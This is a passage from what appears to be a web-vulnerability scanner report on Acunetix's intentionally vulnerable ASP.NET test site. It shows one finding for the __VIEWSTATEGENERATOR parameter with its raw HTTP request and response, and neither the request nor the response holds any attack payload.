href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	POST
Parameter	__VIEWSTATEGENERATOR
Attack
Evidence
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Content-Length: 6507 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,507 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH%2F%2FaNq1Q9scKgXRi5G
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 22875
Response Body - size: 22,875 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGZvvLHX89VirHfgZv59zKO75WKS" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the 